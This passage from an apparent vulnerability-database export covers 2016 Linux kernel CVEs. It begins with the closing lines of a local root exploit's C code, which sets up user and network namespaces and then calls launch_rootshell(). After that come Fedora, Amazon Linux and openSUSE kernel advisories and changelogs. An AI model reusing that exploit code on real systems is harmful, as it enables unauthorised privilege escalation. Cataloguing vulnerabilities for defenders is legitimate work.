fprintf(stderr,\"i have no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n if(unshare(CLONE_NEWUSER) != 0)\r\n fprintf(stderr, \"failed to create new user namespace\\n\");\r\n \r\n if(unshare(CLONE_NEWNET) != 0)\r\n fprintf(stderr, \"failed to create new network namespace\\n\");\r\n \r\n wrapper();\r\n exit(0);\r\n }\r\n \r\n waitpid(pid, &status, 0);\r\n \r\n launch_rootshell();\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, 
"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92567"}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630", "CVE-2016-8645", "CVE-2016-9083", "CVE-2016-9084"], "description": "The kernel meta package ", "modified": "2016-11-24T08:29:52", "published": "2016-11-24T08:29:52", "id": "FEDORA:D89B960F8CA9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.8.8-100.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9083", "CVE-2016-9084"], "description": "The kernel meta package ", "modified": "2016-11-07T23:34:12", "published": "2016-11-07T23:34:12", "id": "FEDORA:3D4286087E43", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.8.6-201.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630"], "description": "The kernel meta package ", "modified": "2016-11-17T02:27:30", "published": "2016-11-17T02:27:30", "id": "FEDORA:8EB6260D0217", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.8.7-200.fc24", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630"], "description": "The kernel meta package ", "modified": "2016-11-19T22:23:25", "published": "2016-11-19T22:23:25", "id": "FEDORA:E2FD36125E3E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.8.7-300.fc25", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-9083", "CVE-2016-8645"], "description": "**Issue Overview:**\n\n[CVE-2016-8645 
__](<https://access.redhat.com/security/cve/CVE-2016-8645>) kernel: a BUG() statement can be hit in net/ipv4/tcp_input.c \nIt was discovered that the Linux kernel since 3.6-rc1 with net.ipv4.tcp_fastopen set to 1 can hit a BUG() statement in the tcp_collapse() function after making a number of certain syscalls, leading to a possible system crash.\n\n[CVE-2016-8655 __](<https://access.redhat.com/security/cve/CVE-2016-8655>) kernel: Race condition in packet_set_ring leads to use after free \nA race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system.\n\n[CVE-2016-9083 __](<https://access.redhat.com/security/cve/CVE-2016-9083>) kernel: State machine confusion bug in vfio driver leading to memory corruption \nA flaw was discovered in the Linux kernel's implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution.\n\n[CVE-2016-9084 __](<https://access.redhat.com/security/cve/CVE-2016-9084>) kernel: Integer overflow when using kzalloc in vfio driver \nThe use of kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with [CVE-2016-9083 __](<https://access.redhat.com/security/cve/CVE-2016-9083>) may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-debuginfo-common-i686-4.4.35-33.55.amzn1.i686 \n perf-debuginfo-4.4.35-33.55.amzn1.i686 \n kernel-tools-4.4.35-33.55.amzn1.i686 \n perf-4.4.35-33.55.amzn1.i686 \n kernel-4.4.35-33.55.amzn1.i686 \n kernel-tools-debuginfo-4.4.35-33.55.amzn1.i686 \n kernel-headers-4.4.35-33.55.amzn1.i686 \n kernel-debuginfo-4.4.35-33.55.amzn1.i686 \n kernel-tools-devel-4.4.35-33.55.amzn1.i686 \n kernel-devel-4.4.35-33.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.35-33.55.amzn1.noarch \n \n src: \n kernel-4.4.35-33.55.amzn1.src \n \n x86_64: \n kernel-tools-4.4.35-33.55.amzn1.x86_64 \n perf-debuginfo-4.4.35-33.55.amzn1.x86_64 \n kernel-headers-4.4.35-33.55.amzn1.x86_64 \n kernel-tools-devel-4.4.35-33.55.amzn1.x86_64 \n perf-4.4.35-33.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.35-33.55.amzn1.x86_64 \n kernel-4.4.35-33.55.amzn1.x86_64 \n kernel-devel-4.4.35-33.55.amzn1.x86_64 \n kernel-debuginfo-4.4.35-33.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.35-33.55.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2016-12-06T23:44:00", "published": "2016-12-06T23:44:00", "id": "ALAS-2016-772", "href": "https://alas.aws.amazon.com/ALAS-2016-772.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-12-08T17:30:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-9794", "CVE-2016-8633", "CVE-2016-8655", "CVE-2016-9084", "CVE-2015-8962", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-9178", "CVE-2015-8963", "CVE-2016-9083", "CVE-2015-8956", "CVE-2016-8646", "CVE-2016-7913", "CVE-2016-7042"], "edition": 1, "description": "The openSUSE Leap 42.1 kernel was updated to 4.1.36 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n 
privileges (bsc#1012754).\n - CVE-2016-9794: A use-after-free in ALSA pcm could lead to crashes or\n allowed local users to potentially gain privileges (bsc#1013533).\n - CVE-2015-8962: Double free vulnerability in the sg_common_write function\n in drivers/scsi/sg.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (memory corruption and system\n crash) by detaching a device during an SG_IO ioctl call (bnc#1010501).\n - CVE-2016-9178: The __get_user_asm_ex macro in\n arch/x86/include/asm/uaccess.h in the Linux kernel did not initialize a\n certain integer variable, which allowed local users to obtain sensitive\n information from kernel stack memory by triggering failure of a\n get_user_ex call (bnc#1008650).\n - CVE-2016-7913: The xc2028_set_config function in\n drivers/media/tuners/tuner-xc2028.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service (use-after-free)\n via vectors involving omission of the firmware name from a certain data\n structure (bnc#1010478).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bnc#1011685).\n - CVE-2015-8963: Race condition in kernel/events/core.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (use-after-free) by leveraging incorrect handling of an swevent\n data structure during a CPU unplug operation (bnc#1010502).\n - CVE-2015-8964: The tty_set_termios_ldisc function in\n drivers/tty/tty_ldisc.c in the Linux kernel allowed local users to\n obtain sensitive information from kernel memory by reading a tty data\n structure (bnc#1010507).\n - CVE-2016-8646: The hash_accept function in crypto/algif_hash.c in the\n Linux kernel allowed local users to cause a 
denial of service (OOPS) by\n attempting to trigger use of in-kernel hash algorithms for a socket that\n has received zero bytes of data (bnc#1010150).\n - CVE-2016-8633: drivers/firewire/net.c in the Linux kernel in certain\n unusual hardware configurations, allowed remote attackers to execute\n arbitrary code via crafted fragmented packets (bnc#1008833).\n - CVE-2016-8630: The x86_decode_insn function in arch/x86/kvm/emulate.c in\n the Linux kernel, when KVM is enabled, allowed local users to cause a\n denial of service (host OS crash) via a certain use of a ModR/M byte in\n an undefined instruction (bnc#1009222).\n - CVE-2016-9083: drivers/vfio/pci/vfio_pci.c in the Linux kernel allowed\n local users to bypass integer overflow checks, and cause a denial of\n service (memory corruption) or have unspecified other impact, by\n leveraging access to a vfio PCI device file for a VFIO_DEVICE_SET_IRQS\n ioctl call, aka a "state machine confusion bug" (bnc#1007197).\n - CVE-2016-9084: drivers/vfio/pci/vfio_pci_intrs.c in the Linux kernel\n misuses the kzalloc function, which allowed local users to cause a\n denial of service (integer overflow) or have unspecified other impact by\n leveraging access to a vfio PCI device file (bnc#1007197).\n - CVE-2016-7042: The proc_keys_show function in security/keys/proc.c in\n the Linux kernel through 4.8.2, when the GNU Compiler Collection (gcc)\n stack protector is enabled, uses an incorrect buffer size for certain\n timeout data, which allowed local users to cause a denial of service\n (stack memory corruption and panic) by reading the /proc/keys file\n (bnc#1004517).\n - CVE-2016-7097: The filesystem implementation in the Linux kernel\n preserves the setgid bit during a setxattr call, which allowed local\n users to gain group privileges by leveraging the existence of a setgid\n program with restrictions on execute permissions (bnc#995968).\n - CVE-2015-8956: The rfcomm_sock_bind function in\n net/bluetooth/rfcomm/sock.c in the 
Linux kernel allowed local users to\n obtain sensitive information or cause a denial of service (NULL pointer\n dereference) via vectors involving a bind system call on a Bluetooth\n RFCOMM socket (bnc#1003925).\n\n The following non-security bugs were fixed:\n\n - ata: ahci_xgene: dereferencing uninitialized pointer in probe\n (bsc#1006580).\n - blacklist.conf: add some commits (bsc#1006580)\n - bna: Add synchronization for tx ring (bsc#993739).\n - bonding: set carrier off for devices created through netlink\n (bsc#999577).\n - btrfs: deal with duplicates during extent_map insertion in\n btrfs_get_extent (bsc#1001171).\n - btrfs: deal with existing encompassing extent map in btrfs_get_extent()\n (bsc#1001171).\n - btrfs: fix extent tree corruption due to relocation (bsc#990384).\n - btrfs: fix races on root_log_ctx lists (bsc#1007653).\n - ext4: fix data exposure after a crash (bsc#1012876).\n - ext4: fix reference counting bug on block allocation error (bsc#1012876).\n - gre: Disable segmentation offloads w/ CSUM and we are encapsulated via\n FOU (bsc#1001486).\n - gro: Allow tunnel stacking in the case of FOU/GUE (bsc#1001486).\n - ipv6: send NEWLINK on RA managed/otherconf changes (bsc#934067).\n - ipv6: send only one NEWLINK when RA causes changes (bsc#934067).\n - isofs: Do not return EACCES for unknown filesystems (bsc#1012876).\n - jbd2: fix checkpoint list cleanup (bsc#1012876).\n - jbd2: Fix unreclaimed pages after truncate in data=journal mode\n (bsc#1010909).\n - locking/static_key: Fix concurrent static_key_slow_inc() (bsc#1006580).\n - mmc: Fix kabi breakage of mmc-block in 4.1.36 (stable-4.1.36).\n - posix_acl: Added fix for f2fs.\n - Revert "kbuild: add -fno-PIE" (stable-4.1.36).\n - Revert "x86/mm: Expand the exception table logic to allow new handling\n options" (stable-4.1.36).\n - tunnels: Remove encapsulation offloads on decap (bsc#1001486).\n - usbhid: add ATEN CS962 to list of quirky devices (bsc#1007615).\n - vmxnet3: Wake queue from reset 
work (bsc#999907).\n\n", "modified": "2016-12-08T15:07:13", "published": "2016-12-08T15:07:13", "id": "OPENSUSE-SU-2016:3058-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00027.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-08T13:30:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9794", "CVE-2016-8655", "CVE-2016-9084", "CVE-2016-7917", "CVE-2016-8666", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8632", "CVE-2015-1350", "CVE-2016-9083", "CVE-2016-7913", "CVE-2016-7039", "CVE-2016-7042"], "edition": 1, "description": "The openSUSE Leap 42.2 kernel was updated to 4.4.36 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2015-1350: The VFS subsystem in the Linux kernel 3.x provides an\n incomplete set of requirements for setattr operations that\n underspecifies removing extended privilege attributes, which allowed\n local users to cause a denial of service (capability stripping) via a\n failed invocation of a system call, as demonstrated by using chown to\n remove a capability from the ping or Wireshark dumpcap program\n (bnc#914939).\n - CVE-2015-8964: The tty_set_termios_ldisc function in\n drivers/tty/tty_ldisc.c in the Linux kernel allowed local users to\n obtain sensitive information from kernel memory by reading a tty data\n structure (bnc#1010507).\n - CVE-2016-7042: The proc_keys_show function in security/keys/proc.c in\n the Linux kernel through 4.8.2, when the GNU Compiler Collection (gcc)\n stack protector is enabled, uses an incorrect buffer size for certain\n timeout data, which allowed local users to cause a denial of service\n (stack memory corruption and panic) by reading the /proc/keys file\n (bnc#1004517).\n - CVE-2016-7913: The xc2028_set_config function in\n drivers/media/tuners/tuner-xc2028.c in the Linux 
kernel allowed local\n users to gain privileges or cause a denial of service (use-after-free)\n via vectors involving omission of the firmware name from a certain data\n structure (bnc#1010478).\n - CVE-2016-7917: The nfnetlink_rcv_batch function in\n net/netfilter/nfnetlink.c in the Linux kernel did not check whether a\n batch message's length field is large enough, which allowed local users\n to obtain sensitive information from kernel memory or cause a denial of\n service (infinite loop or out-of-bounds read) by leveraging the\n CAP_NET_ADMIN capability (bnc#1010444).\n - CVE-2016-8632: The tipc_msg_build function in net/tipc/msg.c in the\n Linux kernel did not validate the relationship between the minimum\n fragment length and the maximum packet size, which allowed local users\n to gain privileges or cause a denial of service (heap-based buffer\n overflow) by leveraging the CAP_NET_ADMIN capability (bnc#1008831).\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012754).\n - CVE-2016-8666: The IP stack in the Linux kernel allowed remote attackers\n to cause a denial of service (stack consumption and panic) or possibly\n have unspecified other impact by triggering use of the GRO path for\n packets with tunnel stacking, as demonstrated by interleaved IPv4\n headers and GRE headers, a related issue to CVE-2016-7039 (bnc#1001486).\n - CVE-2016-9083: drivers/vfio/pci/vfio_pci.c in the Linux kernel allowed\n local users to bypass integer overflow checks, and cause a denial of\n service (memory corruption) or have unspecified other impact, by\n leveraging access to a vfio PCI device file for a VFIO_DEVICE_SET_IRQS\n ioctl call, aka a "state machine confusion bug (bnc#1007197).\n - CVE-2016-9084: drivers/vfio/pci/vfio_pci_intrs.c in the Linux kernel\n misuses the kzalloc function, which allowed local users to cause a\n denial of service (integer overflow) or 
have unspecified other impact by\n leveraging access to a vfio PCI device file (bnc#1007197).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bnc#1011685).\n - CVE-2016-9794: A use-after-free in alsa pcm could lead to crashes or\n allowed local users to potentially gain privileges (bsc#1013533).\n\n The following non-security bugs were fixed:\n\n - acpi / pad: do not register acpi_pad driver if running as Xen dom0\n (bnc#995278).\n - Add power key support for PMIcs which are already included in the\n configs (boo#1012477). Arm64 already has these so no need to patch it.\n - alsa: hda - Bind with i915 only when Intel graphics is present\n (bsc#1012767).\n - alsa: hda - Clear the leftover component assignment at\n snd_hdac_i915_exit() (bsc#1012767).\n - alsa: hda - Degrade i915 binding failure message (bsc#1012767).\n - alsa: hda - Fix yet another i915 pointer leftover in error path\n (bsc#1012767).\n - alsa: hda - Gate the mic jack on HP Z1 Gen3 AiO (bsc#1004365).\n - arm64/efi: Enable runtime call flag checking (bsc#1005745).\n - arm64/efi: Move to generic {__,}efi_call_virt() (bsc#1005745).\n - arm64: Refuse to install 4k kernel on 64k system\n - arm64: Update config files. 
Disable CONFIG_IPMI_SI_PROBE_DEFAULTS\n (bsc#1006576)\n - arm: bcm2835: add CPU node for ARM core (boo#1012094).\n - arm: bcm2835: Split the DT for peripherals from the DT for the CPU\n (boo#1012094).\n - asoc: cht_bsw_rt5645: Enable jack detection (bsc#1010690).\n - asoc: cht_bsw_rt5645: Fix writing to string literal (bsc#1010690).\n - asoc: cht_bsw_rt5672: Use HID translation unit (bsc#1010690).\n - asoc: intel: add function stub when ACPI is not enabled (bsc#1010690).\n - asoc: Intel: add fw name to common dsp context (bsc#1010690).\n - asoc: Intel: Add missing 10EC5672 ACPI ID matching for Cherry Trail\n (bsc#1010690).\n - asoc: Intel: Add module tags for common match module (bsc#1010690).\n - asoc: Intel: add NULL test (bsc#1010690).\n - asoc: Intel: Add quirks for MinnowBoard MAX (bsc#1010690).\n - asoc: Intel: Add surface3 entry in CHT-RT5645 machine (bsc#1010690).\n - asoc: Intel: Atom: add 24-bit support for media playback and capture\n (bsc#1010690).\n - asoc: Intel: Atom: add deep buffer definitions for atom platforms\n (bsc#1010690).\n - asoc: Intel: Atom: add definitions for modem/SSP0 interface\n (bsc#1010690).\n - asoc: Intel: Atom: Add quirk for Surface 3 (bsc#1010690).\n - asoc: Intel: Atom: add support for CHT w/ RT5640 (bsc#1010690).\n - asoc: Intel: Atom: Add support for HP ElitePad 1000 G2 (bsc#1010690).\n - asoc: Intel: Atom: add support for RT5642 (bsc#1010690).\n - asoc: Intel: Atom: add terminate entry for dmi_system_id tables\n (bsc#1010690).\n - asoc: Intel: Atom: auto-detection of Baytrail-CR (bsc#1010690).\n - asoc: Intel: Atom: clean-up compressed DAI definition (bsc#1010690).\n - asoc: Intel: atom: enable configuration of SSP0 (bsc#1010690).\n - asoc: Intel: atom: fix 0-day warnings (bsc#1010690).\n - asoc: Intel: Atom: fix boot warning (bsc#1010690).\n - asoc: Intel: Atom: Fix message handling during drop stream (bsc#1010690).\n - asoc: Intel: atom: fix missing breaks that would cause the wrong\n operation to execute (bsc#1010690).\n 
- asoc: Intel: Atom: fix regression on compress DAI (bsc#1010690).\n - asoc: Intel: Atom: flip logic for gain Switch (bsc#1010690).\n - asoc: Intel: atom: Make some messages to debug level (bsc#1010690).\n - asoc: Intel: Atom: move atom driver to common acpi match (bsc#1010690).\n - asoc: Intel: atom: statify cht_quirk (bsc#1010690).\n - asoc: Intel: boards: add DEEP_BUFFER support for BYT/CHT/BSW\n (bsc#1010690).\n - asoc: Intel: boards: align pin names between byt-rt5640 drivers\n (bsc#1010690).\n - asoc: Intel: boards: merge DMI-based quirks in bytcr-rt5640 driver\n (bsc#1010690).\n - asoc: Intel: boards: start merging byt-rt5640 drivers (bsc#1010690).\n - asoc: Intel: bytcr_rt56040: additional routing quirks (bsc#1010690).\n - asoc: Intel: bytcr-rt5640: add Asus T100TAF quirks (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: add IN3 map (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: add MCLK support (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: Add quirk for Teclast X98 Air 3G tablet\n (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: add SSP2_AIF2 routing (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: change quirk position (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: default routing and quirks on Baytrail-CR\n (bsc#1010690).\n - asoc: Intel: bytcr-rt5640: enable ASRC (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: enable differential mic quirk (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: fix dai/clock setup for SSP0 routing\n (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: fixup DAI codec_name with HID (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: log quirks (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: quirk for Acer Aspire SWS-012 (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: quirk for mono speaker (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: set SSP to I2S mode 2ch (bsc#1010690).\n - asoc: Intel: bytcr_rt5640: use HID translation util (bsc#1010690).\n - asoc: Intel: cht: fix uninit variable warning (bsc#1010690).\n - asoc: Intel: common: add translation from HID to 
codec-name\n (bsc#1010690).\n - asoc: Intel: common: filter ACPI devices with _STA return value\n (bsc#1010690).\n - asoc: Intel: common: increase the loglevel of "FW Poll Status"\n (bsc#1010690).\n - asoc: Intel: Create independent acpi match module (bsc#1010690).\n - asoc: intel: Fix sst-dsp dependency on dw stuff (bsc#1010690).\n - asoc: Intel: Keep building old baytrail machine drivers (bsc#1010690).\n - asoc: Intel: Load the atom DPCM driver only (bsc#1010690).\n - asoc: intel: make function stub static (bsc#1010690).\n - asoc: Intel: Move apci find machine routines (bsc#1010690).\n - asoc: intel: Replace kthread with work (bsc#1010690).\n - asoc: Intel: Skylake: Always acquire runtime pm ref on unload\n (bsc#1005917).\n - asoc: Intel: sst: fix sst_memcpy32 wrong with non-4x bytes issue\n (bsc#1010690).\n - asoc: rt5640: add ASRC support (bsc#1010690).\n - asoc: rt5640: add internal clock source support (bsc#1010690).\n - asoc: rt5640: add master clock handling for rt5640 (bsc#1010690).\n - asoc: rt5640: add supplys for dac power (bsc#1010690).\n - asoc: rt5640: remove unused variable (bsc#1010690).\n - asoc: rt5640: Set PLL src according to source (bsc#1010690).\n - asoc: rt5645: add DAC1 soft volume func control (bsc#1010690).\n - asoc: rt5645: Add dmi_system_id "Google Setzer" (bsc#1010690).\n - asoc: rt5645: extend delay time for headphone pop noise (bsc#1010690).\n - asoc: rt5645: fix reg-2f default value (bsc#1010690).\n - asoc: rt5645: improve headphone pop when system resumes from S3\n (bsc#1010690).\n - asoc: rt5645: improve IRQ reaction time for HS button (bsc#1010690).\n - asoc: rt5645: merge DMI tables of google projects (bsc#1010690).\n - asoc: rt5645: patch reg-0x8a (bsc#1010690).\n - asoc: rt5645: polling jd status in all conditions (bsc#1010690).\n - asoc: rt5645: Separate regmap for rt5645 and rt5650 (bsc#1010690).\n - asoc: rt5645: set RT5645_PRIV_INDEX as volatile (bsc#1010690).\n - asoc: rt5645: use polling to support HS button 
(bsc#1010690).\n - asoc: rt5645: Use the mod_delayed_work instead of the queue_delayed_work\n and cancel_delayed_work_sync (bsc#1010690).\n - asoc: rt5670: Add missing 10EC5072 ACPI ID (bsc#1010690).\n - asoc: rt5670: Enable Braswell platform workaround for Dell Wyse 3040\n (bsc#1010690).\n - asoc: rt5670: fix HP Playback Volume control (bsc#1010690).\n - asoc: rt5670: patch reg-0x8a (bsc#1010690).\n - blacklist.conf: Remove intel_pstate potential patch that SLE 12 SP2 The\n code layout upstream that motivated this patch is completely different\n to what is in SLE 12 SP2 as schedutil was not backported.\n - bna: Add synchronization for tx ring (bsc#993739).\n - btrfs: allocate root item at snapshot ioctl time (bsc#1012452).\n - btrfs: better packing of btrfs_delayed_extent_op (bsc#1012452).\n - btrfs: Check metadata redundancy on balance (bsc#1012452).\n - btrfs: clean up an error code in btrfs_init_space_info() (bsc#1012452).\n - btrfs: cleanup, stop casting for extent_map->lookup everywhere\n (bsc#1012452).\n - btrfs: cleanup, use enum values for btrfs_path reada (bsc#1012452).\n - btrfs: deal with duplicates during extent_map insertion in\n btrfs_get_extent (bsc#1001171).\n - btrfs: deal with existing encompassing extent map in btrfs_get_extent()\n (bsc#1001171).\n - btrfs: do an allocation earlier during snapshot creation (bsc#1012452).\n - btrfs: do not create or leak aliased root while cleaning up orphans\n (bsc#994881).\n - btrfs: do not leave dangling dentry if symlink creation failed\n (bsc#1012452).\n - btrfs: do not use slab cache for struct btrfs_delalloc_work\n (bsc#1012452).\n - btrfs: drop duplicate prefix from scrub workqueues (bsc#1012452).\n - btrfs: drop unused parameter from lock_extent_bits (bsc#1012452).\n - btrfs: Enhance chunk validation check (bsc#1012452).\n - btrfs: Enhance super validation check (bsc#1012452).\n - btrfs: Ensure proper sector alignment for btrfs_free_reserved_data_space\n (bsc#1005666).\n - btrfs: Expoert and move 
leaf/subtree qgroup helpers to qgroup.c\n (bsc983087, bsc986255).\n - btrfs: fix incremental send failure caused by balance (bsc#985850).\n - btrfs: fix locking bugs when defragging leaves (bsc#1012452).\n - btrfs: fix memory leaks after transaction is aborted (bsc#1012452).\n - btrfs: fix output of compression message in btrfs_parse_options()\n (bsc#1012452).\n - btrfs: fix race between free space endio workers and space cache\n writeout (bsc#1012452).\n - btrfs: fix races on root_log_ctx lists (bsc#1007653).\n - btrfs: fix race when finishing dev replace leading to transaction abort\n (bsc#1012452).\n - btrfs: fix relocation incorrectly dropping data references (bsc#990384).\n - btrfs: fix typo in log message when starting a balance (bsc#1012452).\n - btrfs: fix unprotected list operations at btrfs_write_dirty_block_groups\n (bsc#1012452).\n - btrfs: handle quota reserve failure properly (bsc#1005666).\n - btrfs: make btrfs_close_one_device static (bsc#1012452).\n - btrfs: make clear_extent_bit helpers static inline (bsc#1012452).\n - btrfs: make clear_extent_buffer_uptodate return void (bsc#1012452).\n - btrfs: make end_extent_writepage return void (bsc#1012452).\n - btrfs: make extent_clear_unlock_delalloc return void (bsc#1012452).\n - btrfs: make extent_range_clear_dirty_for_io return void (bsc#1012452).\n - btrfs: make extent_range_redirty_for_io return void (bsc#1012452).\n - btrfs: make lock_extent static inline (bsc#1012452).\n - btrfs: make set_extent_bit helpers static inline (bsc#1012452).\n - btrfs: make set_extent_buffer_uptodate return void (bsc#1012452).\n - btrfs: make set_range_writeback return void (bsc#1012452).\n - btrfs: preallocate path for snapshot creation at ioctl time\n (bsc#1012452).\n - btrfs: put delayed item hook into inode (bsc#1012452).\n - btrfs: qgroup: Add comments explaining how btrfs qgroup works\n (bsc983087, bsc986255).\n - btrfs: qgroup: Fix qgroup data leaking by using subtree tracing\n (bsc983087, bsc986255).\n - btrfs: 
qgroup: Rename functions to make it follow reserve, trace,\n account steps (bsc983087, bsc986255).\n - btrfs: remove a trivial helper btrfs_set_buffer_uptodate (bsc#1012452).\n - btrfs: remove root_log_ctx from ctx list before btrfs_sync_log returns\n (bsc#1007653).\n - btrfs: remove unused inode argument from uncompress_inline()\n (bsc#1012452).\n - btrfs: remove wait from struct btrfs_delalloc_work (bsc#1012452).\n - btrfs: send, do not bug on inconsistent snapshots (bsc#985850).\n - btrfs: sink parameter wait to btrfs_alloc_delalloc_work (bsc#1012452).\n - btrfs: Support convert to -d dup for btrfs-convert (bsc#1012452).\n - btrfs: Update\n patches.suse/btrfs-8401-fix-qgroup-accounting-when-creating-snap.patch\n (bsc#972993).\n - btrfs: use GFP_KERNEL for allocations in ioctl handlers (bsc#1012452).\n - btrfs: use GFP_KERNEL for allocations of workqueues (bsc#1012452).\n - btrfs: use GFP_KERNEL for xattr and acl allocations (bsc#1012452).\n - btrfs: use smaller type for btrfs_path locks (bsc#1012452).\n - btrfs: use smaller type for btrfs_path lowest_level (bsc#1012452).\n - btrfs: use smaller type for btrfs_path reada (bsc#1012452).\n - btrfs: verbose error when we find an unexpected item in sys_array\n (bsc#1012452).\n - config: i2c: Enable CONFIG_I2C_DESIGNWARE_PLATFORM and *_BAYTRAIL\n (bsc#1010690) Realtek codecs on CHT platform require this i2c bus driver.\n - config: select new CONFIG_SND_SOC_INTEL_SST_* helpers\n - config: Update config files. (boo#1012094)\n - config: Update config files (bsc#1009454) Do not set\n CONFIG_EFI_SECURE_BOOT_SECURELEVEL in x86_64/default and x86_64/debug.\n We do not need to set CONFIG_EFI_SECURE_BOOT_SECURELEVEL in openSUSE\n kernel because openSUSE does not enable kernel module signature check\n (bsc#843661). Without kernel module signature check, the root account is\n allowed to load arbitrary kernel module to kernel space. 
Then lock\n functions by securelevel is pointless.\n - cxgbi: fix uninitialized flowi6 (bsc#963904 FATE#320115).\n - Delete\n patches.fixes/Add-a-missed-complete-in-iscsit_close_connection.patch.\n remove patch Add-a-missed-complete-in-iscsit_close_connection.patch add\n bsc#997807 bsc#992555 in patch-4.4.27-28 references\n - dell-laptop: Fixate rfkill work on CPU#0 (bsc#1004052).\n - dell-wmi: Check if Dell WMI descriptor structure is valid (bsc#1004052).\n - dell-wmi: Clean up hotkey table size check (bsc#1004052).\n - dell-wmi: Ignore WMI event code 0xe045 (bsc#1004052).\n - dell-wmi: Improve unknown hotkey handling (bsc#1004052).\n - dell-wmi: Process only one event on devices with interface version 0\n (bsc#1004052).\n - dell-wmi: Stop storing pointers to DMI tables (bsc#1004052).\n - dell-wmi: Support new hotkeys on the XPS 13 9350 (Skylake) (bsc#1004052).\n - dell_wmi: Use a C99-style array for bios_to_linux_keycode (bsc#1004052).\n - drm/i915: Add missing ring_mask to Pineview (bsc#1005917).\n - drm/i915: Calculate watermark related members in the crtc_state, v4\n (bsc#1011176).\n - drm/i915/ivb: Move WaCxSRDisabledForSpriteScaling w/a to atomic check\n (bsc#1011176).\n - drm/i915: Move disable_cxsr to the crtc_state (bsc#1011176).\n - drm/mgag200: fix error return code in mgag200fb_create() (bsc#1005917).\n - drm/radeon: Also call cursor_move_locked when the cursor size changes\n (bsc#1000433).\n - drm/radeon: Always store CRTC relative radeon_crtc->cursor_x/y values\n (bsc#1000433).\n - drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on\n (bsc#998054)\n - drm/radeon: Hide the HW cursor while it's out of bounds (bsc#1000433).\n - drm/radeon: Switch to drm_vblank_on/off 